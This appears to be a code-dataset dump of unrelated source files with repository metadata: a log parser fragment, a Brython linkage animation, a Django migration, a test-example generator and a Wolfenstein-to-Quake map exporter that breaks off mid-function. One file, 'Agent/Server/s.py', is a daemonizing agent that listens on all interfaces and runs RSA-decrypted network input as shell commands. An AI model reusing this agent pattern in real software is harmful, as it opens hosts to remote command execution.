u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
try:
timestamp = datetime.datetime.fromtimestamp(time, zone)
except ValueError:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
return timestamp.year
manager.ParsersManager.RegisterParser(MacSecuritydLogParser)
|
apache-2.0
| 7,085,151,202,668,476,000
| 33.300725
| 80
| 0.680046
| false
| 3.961088
| false
| false
| false
|
selboo/starl-mangle
|
Agent/Server/s.py
|
1
|
4397
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket, os, subprocess, sys
import time,select,threading
import rsa,base64
import l_command
PRIVATE = os.getcwd()+"/private.pem"
def exchengx_text(text):
Result_Text = []
for i in range(len(text)):
Result_Text.append(''.join(text[i]))
Result_Text = ''.join(Result_Text)
return Result_Text
def key():
return 'Selboo'
def decryption(crypto):
with open(PRIVATE) as privatefile:
p = privatefile.read()
privkey = rsa.PrivateKey.load_pkcs1(p)
try:
message = rsa.decrypt(crypto, privkey)
except rsa.pkcs1.DecryptionError, e:
message = False
print 'ID-002 DecryptionError...:%s' % e
return message
def tcpsocket():
try:
name = 'selboo'
listen_ip = '0.0.0.0'
socket_port = '54321'
buffer_size = '1024'
listen_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_tcp.bind((listen_ip, int(socket_port)))
listen_tcp.setblocking(0)
listen_tcp.listen(100)
except socket.error, e:
print 'ID-001 Create Socket Error...:%s' % e
os._exit(0)
def tcp_send(connection, content):
tcp_limit = 100
tcp_length = len(content)
tcp_subcon = tcp_length / tcp_limit
tcp_tail = tcp_length % tcp_limit
tcp_start = 0
tcp_stop = tcp_limit
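  # fixed 100-byte header: '<total_length>,<chunk_count>|<agent_name>'
  # padded with spaces; the payload follows in tcp_limit-sized chunks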
tcp_head = str(tcp_length)+','+str(tcp_subcon)+'|'+name
tcp_head = tcp_head.ljust(tcp_limit)
connection.send(tcp_head)
if tcp_length <= tcp_limit:
connection.send(content[tcp_start:tcp_length])
return 0
for i in range(0,tcp_subcon):
tcp_d = content[tcp_start:tcp_stop]
connection.send(tcp_d)
time.sleep(0.0001)
tcp_start = tcp_stop
tcp_stop = tcp_stop + tcp_limit
tcp_t = content[tcp_start:tcp_length]
connection.send(tcp_t)
return 0
def command(tag, connection, reault):
if tag == 1:
Reault_exchangx = exchengx_text(reault)
#connection.send(base64.encodestring(Reault_exchangx))
#print Reault_exchangx
tcp_send(connection, Reault_exchangx)
return 0
else:
tcp_send(connection, reault)
return 0
return 1
def tcmd(Test, listen_tcp):
connection,address = listen_tcp.accept()
buf_src = connection.recv(int(buffer_size))
if decryption(buf_src):
buf = decryption(buf_src)
else:
buf_src = 'Decryption failed '+buf_src
connection.send(buf_src)
return 0
if buf == 'l_restart':
reload(l_command)
command(2, connection, str('Restart...'))
return 0
cmd = l_command.l_main(buf)
if cmd:
command(2, connection, str(cmd))
return 0
if len(buf) != 0:
p = subprocess.Popen(str(buf), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Result_out = p.stdout.readlines()
if Result_out:
command(1, connection, Result_out)
Result_err = p.stderr.readlines()
if Result_err:
command(1, connection, Result_err)
connection.close()
return 0
while True:
infds,outfds,errfds = select.select([listen_tcp,],[],[],5)
if len(infds) != 0:
ting = threading.Thread(target=tcmd, args=('Test', listen_tcp))
ting.start()
def createDaemon():
try:
if os.fork() > 0:
os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
#print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
#conn.send(os.getpid())
#conn.close()
funzioneDemo()
def funzioneDemo():
tcpsocket()
if __name__ == '__main__':
createDaemon()
|
apache-2.0
| -6,994,118,043,903,329,000
| 27.006369
| 125
| 0.549011
| false
| 3.526063
| false
| false
| false
|
wiredrive/wtframework
|
generate_examples.py
|
1
|
2872
|
##########################################################################
# This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from __future__ import print_function
import os
from six import u
# This file takes the files in the /tests directory, then converts them
# into strings in wtframework/wtf/_devtools_/filetemplates/examples.py
# These are the files that are generated when the user does --withexamples
# in the project generator
if __name__ == '__main__':
example_path = os.path.join('wtframework', 'wtf', '_devtools_', 'filetemplates', '_examples_.py')
print(example_path)
examples_file = open(example_path,
"w")
examples_file.write(u("""##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from six import u
examples = {}
"""))
for root, dirs, files in os.walk('tests'):
for example_file in files:
if not example_file.endswith(".py"):
continue
fpath = os.path.join(root, example_file)
print("processing ", fpath)
the_file = open(fpath)
examples_file.write(u("examples['" + fpath + "'] = u('''"))
examples_file.write(u(the_file.read().replace("'''", '"""')))
examples_file.write(u("\n''')\n\n"))
examples_file.close()
|
gpl-3.0
| -365,536,399,557,576,400
| 38.888889
| 103
| 0.587396
| false
| 4.391437
| false
| false
| false
|
2014c2g5/2014cadp
|
wsgi/local_data/brython_programs/fourbar1.py
|
1
|
1463
|
# need yen_fourbar.js
from javascript import JSConstructor
import math
from browser import doc
import browser.timer
# convert Javascript function object into Brython object
point = JSConstructor(Point)
line = JSConstructor(Line)
link = JSConstructor(Link)
triangle = JSConstructor(Triangle)
def draw():
global theta
# clear canvas context
ctx.clearRect(0, 0, canvas.width, canvas.height)
# draw linkeage
line1.drawMe(ctx)
line2.drawMe(ctx)
line3.drawMe(ctx)
# draw triangles
#triangle1.drawMe(ctx)
#triangle2.drawMe(ctx)
# input link rotation increment
theta += dx
# calculate new p2 position according to new theta angle
p2.x = p1.x + line1.length*math.cos(theta*degree)
p2.y = p1.y - line1.length*math.sin(theta*degree)
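    # recompute p3 from the new p2, the fixed pivot p4 and the constant
    # link lengths so the four-bar loop stays closed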
temp = triangle2.setPPSS(p2, p4, link3_len, link2_len)
p3.x = temp[0]
p3.y = temp[1]
x, y, r = 10, 10, 10
# define canvas and context
canvas = doc["plotarea"]
ctx = canvas.getContext("2d")
# fourbar linkage inputs
theta = 0
degree = math.pi/180
dx = 2
dy = 4
p1 = point(150, 100)
p2 = point(150, 200)
p3 = point(300, 300)
p4 = point(350, 100)
line1 = link(p1, p2)
line2 = link(p2, p3)
line3 = link(p3, p4)
line4 = link(p1, p4)
line5 = link(p2, p4)
link2_len = p2.distance(p3)
link3_len = p3.distance(p4)
triangle1 = triangle(p1,p2,p4)
triangle2 = triangle(p2,p3,p4)
temp = []
ctx.translate(0, canvas.height)
ctx.scale(1, -1)
browser.timer.set_interval(draw, 10)
|
gpl-3.0
| -3,730,226,384,178,324,500
| 23.813559
| 60
| 0.688312
| false
| 2.719331
| false
| false
| false
|
hydroshare/django_docker_processes
|
migrations/0001_initial.py
|
1
|
9489
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import jsonfield.fields
import django_docker_processes.models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ContainerOverrides',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=256)),
('command', models.TextField(null=True, blank=True)),
('working_dir', models.CharField(max_length=65536, null=True, blank=True)),
('user', models.CharField(max_length=65536, null=True, blank=True)),
('entrypoint', models.CharField(max_length=65536, null=True, blank=True)),
('privileged', models.BooleanField(default=False)),
('lxc_conf', models.CharField(max_length=65536, null=True, blank=True)),
('memory_limit', models.IntegerField(default=0, help_text=b'megabytes')),
('cpu_shares', models.IntegerField(help_text=b'CPU Shares', null=True, blank=True)),
('dns', jsonfield.fields.JSONField(help_text=b'JSON list of alternate DNS servers', null=True, blank=True)),
('net', models.CharField(blank=True, max_length=8, null=True, help_text=b'Network settings - leave blank for default behavior', choices=[(b'bridge', b'bridge'), (b'none', b'none'), (b'host', b'host')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('docker_overrides', models.ForeignKey(blank=True, to='django_docker_processes.ContainerOverrides', help_text=b'Overrides for the container to run', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerPort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProcess',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('container_id', models.CharField(max_length=128, null=True, blank=True)),
('token', models.CharField(default=django_docker_processes.models.docker_process_token, unique=True, max_length=128, db_index=True)),
('logs', models.TextField(null=True, blank=True)),
('finished', models.BooleanField(default=False)),
('error', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=1024, db_index=True)),
('git_repository', models.CharField(max_length=16384)),
('git_use_submodules', models.BooleanField(default=False)),
('git_username', models.CharField(max_length=256, null=True, blank=True)),
('git_password', models.CharField(max_length=64, null=True, blank=True)),
('commit_id', models.CharField(max_length=64, null=True, blank=True)),
('branch', models.CharField(default=b'master', max_length=1024, null=True, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536, null=True, blank=True)),
('container', models.CharField(max_length=65536)),
('readonly', models.BooleanField(default=False)),
('docker_profile', models.ForeignKey(to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
('docker_profile_from', models.ForeignKey(help_text=b'This container must be started and running for the target to run', to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverridePort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='dockerprocess',
name='profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerprocess',
name='user',
field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='dockerport',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile',
field=models.ForeignKey(help_text=b'This is the "target" container. It will receive information about\nthe "from" container as an environment var', to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile_from',
field=models.ForeignKey(related_name='profile_link_to', to='django_docker_processes.DockerProfile', help_text=b'This container must be started and running for the target to run'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerenvvar',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='containeroverrides',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
]
|
bsd-3-clause
| 3,178,048,872,036,171,000
| 45.743842
| 219
| 0.562125
| false
| 4.520724
| false
| false
| false
|
TexZK/pywolf
|
bin/export_ql_pk3.py
|
1
|
62849
|
# TODO: create Exporter class(es)
# TODO: break export loops into single item calls with wrapping loop
# TODO: allow export to normal file, PK3 being an option (like with open(file_object|path))
import argparse
import collections
import io
import logging
import os
import sys
import zipfile
from PIL import Image
import numpy as np
from pywolf.audio import samples_upsample, wave_write, convert_imf_to_wave, convert_wave_to_ogg
import pywolf.game
from pywolf.graphics import write_targa_bgrx, build_color_image
import pywolf.persistence
from pywolf.utils import find_partition, load_as_module
OBJECT_LIGHT_MAP = { # name: (normalized_height, amount, color)
'ceiling_light': (0.8, 100, (1.0, 1.0, 0.9)),
'chandelier': (0.8, 200, (1.0, 1.0, 0.8)),
'lamp': (0.6, 100, (1.0, 1.0, 0.9)),
'chalice': (0.2, 30, (1.0, 1.0, 0.8)),
'cross': (0.2, 30, (1.0, 1.0, 0.8)),
'crown': (0.2, 30, (1.0, 1.0, 0.8)),
'jewels': (0.2, 30, (1.0, 1.0, 0.8)),
'extra_life': (0.3, 30, (0.8, 0.8, 1.0)),
'gold_key': (0.2, 30, (1.0, 1.0, 0.8)),
'medkit': (0.2, 30, (1.0, 1.0, 1.0)),
'silver_key': (0.2, 30, (0.8, 1.0, 1.0)),
}
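# Note (added): maps Wolf3D pickups onto roughly equivalent Quake III item
# classnames; the second field is the wait (seconds) reused below for both the
# pickup trigger and the respawn delay.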
COLLECTABLE_ENTITY_MAP = { # (name, wait)
'ammo': ('ammo_pack', 10),
'ammo_used': ('ammo_pack', 10),
'chaingun': ('weapon_chaingun', 5),
'chalice': ('item_armor_shard', 25),
'cross': ('item_armor_shard', 25),
'crown': ('item_armor_shard', 25),
'dog_food': ('item_health_small', 35),
'extra_life': ('item_health_mega', 35),
'food': ('item_health', 35),
'gold_key': ('item_haste', 120),
'jewels': ('item_armor_shard', 25),
'machinegun': ('weapon_hmg', 5),
'medkit': ('item_health_large', 35),
'silver_key': ('item_quad', 120),
}
IMF2WAV_PATH = os.path.join('..', 'tools', 'imf2wav')
OGGENC2_PATH = os.path.join('..', 'tools', 'oggenc2')
TEXTURE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
{{
map {1!s}
rgbGen identityLighting
}}
}}
'''
SPRITE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
deformVertexes autoSprite2
surfaceparm trans
surfaceparm nonsolid
cull none
{{
clampmap {1!s}
alphaFunc GT0
rgbGen identityLighting
}}
}}
'''
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
TOP = 4
BOTTOM = 5
DIR_TO_DISPL = [
( 0, -1, 0),
( 1, 0, 0),
( 0, 1, 0),
(-1, 0, 0),
( 0, 0, 1),
( 0, 0, -1),
]
DIR_TO_YAW = [
90,
0,
270,
180,
0,
0,
]
ENEMY_INDEX_TO_DIR = [
EAST,
NORTH,
WEST,
SOUTH,
]
TURN_TO_YAW = [
0,
45,
90,
135,
180,
225,
270,
315,
]
TURN_TO_DISPL = [
( 1, 0),
( 1, -1),
( 0, -1),
( -1, -1),
( -1, 0),
( -1, 1),
( 0, 1),
( 1, 1),
]
def _force_unlink(*paths):
    # Remove the given files, skipping empty/None paths and ignoring OS errors
    # (e.g. a file that was never created because a conversion step failed).
    for path in paths:
        if not path:
            continue
        try:
            os.unlink(path)
        except OSError:
            pass
def build_cuboid_vertices(extreme_a, extreme_b):
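    # Four corner vertices for each of the six axis-aligned faces, listed in
    # the same order as the direction constants above (NORTH, EAST, SOUTH,
    # WEST, TOP, BOTTOM), which describe_cuboid_brush relies on when pairing
    # faces with shaders and flip directions.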
xa, ya, za = extreme_a
xb, yb, zb = extreme_b
return [[(xb, yb, zb), (xa, yb, zb), (xa, yb, za), (xb, yb, za)],
[(xb, ya, zb), (xb, yb, zb), (xb, yb, za), (xb, ya, za)],
[(xa, ya, zb), (xb, ya, zb), (xb, ya, za), (xa, ya, za)],
[(xa, yb, zb), (xa, ya, zb), (xa, ya, za), (xa, yb, za)],
[(xa, yb, zb), (xb, yb, zb), (xb, ya, zb), (xa, ya, zb)],
[(xb, yb, za), (xa, yb, za), (xa, ya, za), (xb, ya, za)]]
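# Emit one Quake-style brush definition: an opening brace, one plane line per
# face (three points, shader name, offset/scale and flag fields), and a
# closing brace.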
def describe_cuboid_brush(face_vertices, face_shaders, shader_scales, format_line=None,
flip_directions=(NORTH, WEST), content_flags=None, surface_flags=None):
if format_line is None:
format_line = ('( {0[0]:.0f} {0[1]:.0f} {0[2]:.0f} ) '
'( {1[0]:.0f} {1[1]:.0f} {1[2]:.0f} ) '
'( {2[0]:.0f} {2[1]:.0f} {2[2]:.0f} ) '
'"{3!s}" 0 0 0 {4:f} {5:f} {6:d} {7:d} 0')
if content_flags is None:
content_flags = (0, 0, 0, 0, 0, 0)
if surface_flags is None:
surface_flags = (0, 0, 0, 0, 0, 0)
lines = ['{']
arrays = zip(range(len(face_vertices)), face_shaders, face_vertices, surface_flags, content_flags)
for direction, shader_name, vertices, surface_flags, content_flags in arrays:
scale_u = shader_scales[0]
scale_v = shader_scales[1]
if direction in flip_directions:
scale_u = -scale_u
line = format_line.format(vertices[0], vertices[1], vertices[2],
shader_name, scale_u, scale_v,
content_flags, surface_flags) # TODO: make as arrays?
lines.append(line)
lines.append('}')
return lines
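# Converts a single tilemap into Q3Map2 .map source text: worldspawn brushes
# (walls, floor/ceiling areas, clipping, underworld hollow) followed by point
# and brush entities (player start, doors, pushwalls, collectables, enemy
# spawns).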
class MapExporter(object): # TODO
def __init__(self, params, cfg, tilemap, episode_index, submap_index):
self.params = params
self.cfg = cfg
self.tilemap = tilemap
self.episode_index = episode_index
self.submap_index = submap_index
episode = cfg.EPISODES[episode_index]
self.tilemap_index = episode[0] + submap_index
dimensions = tilemap.dimensions
half_units = params.tile_units / 2
self.unit_offsets = ((-half_units * dimensions[0]), (half_units * dimensions[1]), 0)
self.tile_partition_cache = {}
self.entity_partition_cache = {}
def tile_to_unit_coords(self, tile_coords):
tile_units = self.params.tile_units
return [
(tile_coords[0] * tile_units),
(tile_coords[1] * -tile_units),
]
def center_units(self, tile_coords, unit_offsets=(0, 0, 0), center_z=False):
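        # World-unit centre of a tile, optionally lifted to mid-height of the
        # cell (used for cubes and for point entities placed inside the tile).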
units = self.tile_to_unit_coords(tile_coords)
half = self.params.tile_units / 2
return [(unit_offsets[0] + units[0] + half),
(unit_offsets[1] + units[1] + half),
(unit_offsets[2] + (half if center_z else 0))]
def describe_textured_cube(self, tile_coords, face_shaders, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - half), (center_z - half))
extreme_b = ((center_x + half), (center_y + half), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_textured_sprite(self, tile_coords, face_shader, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - 1), (center_z - half - 1))
extreme_b = ((center_x + half), (center_y + 0), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
face_shaders = [
face_shader,
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
]
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_area_brushes(self, tile_coords): # TODO: support for all floor/ceiling modes of ChaosEdit
params = self.params
cfg = self.cfg
tilemap_index = self.tilemap_index
tile_units = params.tile_units
format_palette_texture = '{}_palette/color_0x{:02x}'.format
lines = []
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.CEILING_COLORS[tilemap_index]),
]
offsets = list(self.unit_offsets)
offsets[2] += tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.FLOOR_COLORS[tilemap_index]),
'common/caulk',
]
offsets = list(self.unit_offsets)
offsets[2] -= tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
return lines
def describe_wall_brush(self, tile_coords):
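        # Choose a shader per horizontal face based on the neighbouring tile:
        # caulk towards other walls and the map border, the wall texture
        # towards floor areas (and pushwalls), and the door-hinge texture
        # towards door tiles.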
params = self.params
cfg = self.cfg
tilemap = self.tilemap
x, y = tile_coords
tile = tilemap[x, y]
partition_map = cfg.TILE_PARTITION_MAP
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
face_shaders = []
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
facing_coords = ((x + displacement[0]), (y + displacement[1]))
facing = tilemap.get(facing_coords)
if facing is None:
shader = 'common/caulk'
else:
if facing[1] == pushwall_entity:
facing_partition = 'floor'
else:
facing_partition = find_partition(facing[0], partition_map, count_sign=1,
cache=self.tile_partition_cache)
if facing_partition == 'wall':
shader = 'common/caulk'
else:
if facing_partition == 'floor':
texture = tile[0] - partition_map['wall'][0]
elif facing_partition in ('door', 'door_elevator', 'door_silver', 'door_gold'):
texture = partition_map['door_hinge'][0] - partition_map['wall'][0]
else:
raise ValueError((tile_coords, facing_partition))
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
if any(shader != 'common/caulk' for shader in face_shaders):
return self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
else:
return ()
def describe_sprite(self, tile_coords):
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
name = cfg.ENTITY_OBJECT_MAP[entity]
lines = []
if name in cfg.SOLID_OBJECT_NAMES:
face_shaders = ['common/clip'] * 6
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets))
face_shader = '{}_static/{}'.format(params.short_name, name)
lines.extend(self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets))
return lines
def describe_collectable(self, tile_coords): # TODO
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
name = cfg.ENTITY_OBJECT_MAP[entity]
give_name, give_wait = COLLECTABLE_ENTITY_MAP[name]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/{}'.format(cfg.COLLECTABLE_PICKUP_SOUNDS[name])),
'}',
]
underworld_z = center_z + params.underworld_offset
give_entity = [
'{',
'classname target_give',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}',
]
target_entity = [
'{',
'classname {}'.format(give_name),
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}'
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
'}',
]
speaker_close_entity = [ # TODO
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/menu__exit'),
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'angle -2',
'lip 0',
'dmg 0',
'health 0',
'wait {:f}'.format(give_wait),
'speed 32767',
]
door_end = ['}']
# Sprite brush
face_shader = '{}_collectable/{}'.format(params.short_name, name)
door_brush = self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
light_entity = [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
else:
light_entity = []
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
give_entity + target_entity + light_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door(self, tile_coords):
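        # A door becomes a func_door brush driven by a trigger_multiple, with
        # target_speaker entities for the open/close sounds and a target_delay
        # that schedules the close sound after the door wait elapses.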
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
_, texture_name, vertical = cfg.DOOR_MAP[tile]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'wait {}'.format(params.door_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__open'), # FIXME: filename
'}',
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'target "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'wait {}'.format((params.door_trigger_wait + params.door_wait) / 2),
'}',
]
speaker_close_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "door_{:.0f}_{:.0f}_close"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'sampled/door__close'), # FIXME: filename
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'angle {:.0f}'.format(270 if vertical else 0),
'lip 2',
'dmg 0',
'health 0',
'wait {}'.format(params.door_wait),
'speed {}'.format(params.door_speed),
]
door_end = ['}']
# Door brush
face_shader = '{}_wall/{}__{}'.format(params.short_name, texture_name, int(vertical))
if vertical:
extreme_a = ((center_x - 1), (center_y - half), (center_z - half))
extreme_b = ((center_x + 1), (center_y + half), (center_z + half))
face_shaders = [
'common/caulk',
face_shader,
'common/caulk',
face_shader,
'common/caulk',
'common/caulk',
]
else:
